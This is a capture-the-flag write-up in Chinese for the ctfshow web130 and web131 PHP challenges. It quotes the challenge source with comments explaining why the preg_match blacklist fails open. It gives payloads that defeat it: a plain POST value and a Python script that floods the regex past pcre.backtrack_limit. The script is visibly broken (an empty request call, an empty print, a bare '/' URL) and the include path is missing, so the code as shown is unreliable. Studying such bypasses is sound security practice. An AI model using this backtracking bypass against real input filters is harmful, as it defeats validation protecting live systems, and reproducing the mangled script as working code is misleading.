
// Challenge source quoted by the write-up: prints $flag only when the POSTed
// field "f" gets past a regex blacklist and then a substring requirement.
// Kept as published; the comments point out where the checks fail open.
error_reporting(0); // silences PHP errors and warnings
highlight_file(__FILE__); // prints this script's own source to the client
// NOTE(review): the include path is empty in this listing (presumably lost when
// the page was extracted). $flag is not assigned in the visible code, so it
// presumably comes from the included file.
include("");
if(isset($_POST['f'])){
    // Taken straight from the request: not cast and not type-checked here.
    $f = $_POST['f'];
    // preg_match() returns 1 on a match, 0 on no match and false on failure,
    // for example when pcre.backtrack_limit (default 1000000) is exceeded.
    // This truthiness test treats false exactly like 0, so a PCRE failure is
    // handled as "pattern not found" and the blacklist fails open.
    // A fail-closed check rejects unless the result is exactly 0
    // (preg_match(...) !== 0) or inspects preg_last_error().
    // The lazy .+? also needs at least one character before "ctfshow", so the
    // pattern does not cover the keyword at offset 0.
    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    // Strict comparison: an offset of 0 is not FALSE, so the keyword at the
    // very start of the input satisfies this requirement.
    if(stripos($f, 'ctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}
①payload:POST:f=ctfshow
②正则回溯payload:
import requests
url="/"
data={ 'f':'very'*250000+'ctfshow'}
r=(url,data=data)
print()
web131(正则回溯)

// Challenge source quoted by the write-up: prints $flag only when the POSTed
// field "f" gets past a regex blacklist and also contains "36Dctfshow".
// Kept as published; the comments point out where the checks fail open.
error_reporting(0); // silences PHP errors and warnings
highlight_file(__FILE__); // prints this script's own source to the client
// NOTE(review): the include path is empty in this listing (presumably lost when
// the page was extracted). $flag is not assigned in the visible code, so it
// presumably comes from the included file.
include("");
if(isset($_POST['f'])){
    // The cast guarantees that both checks below receive a string.
    $f = (String)$_POST['f'];
    // preg_match() returns 1 on a match, 0 on no match and false on failure,
    // for example when pcre.backtrack_limit (default 1000000) is exceeded.
    // This truthiness test treats false exactly like 0, so a PCRE failure is
    // handled as "pattern not found" and the blacklist fails open.
    // A fail-closed check rejects unless the result is exactly 0
    // (preg_match(...) !== 0) or inspects preg_last_error().
    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    // The required substring has characters in front of "ctfshow", so any input
    // that satisfies this check is also matched by the pattern above whenever
    // preg_match() completes normally. Both checks can therefore only pass
    // together when preg_match() fails, which is why the result has to be
    // compared strictly.
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}
payload 同130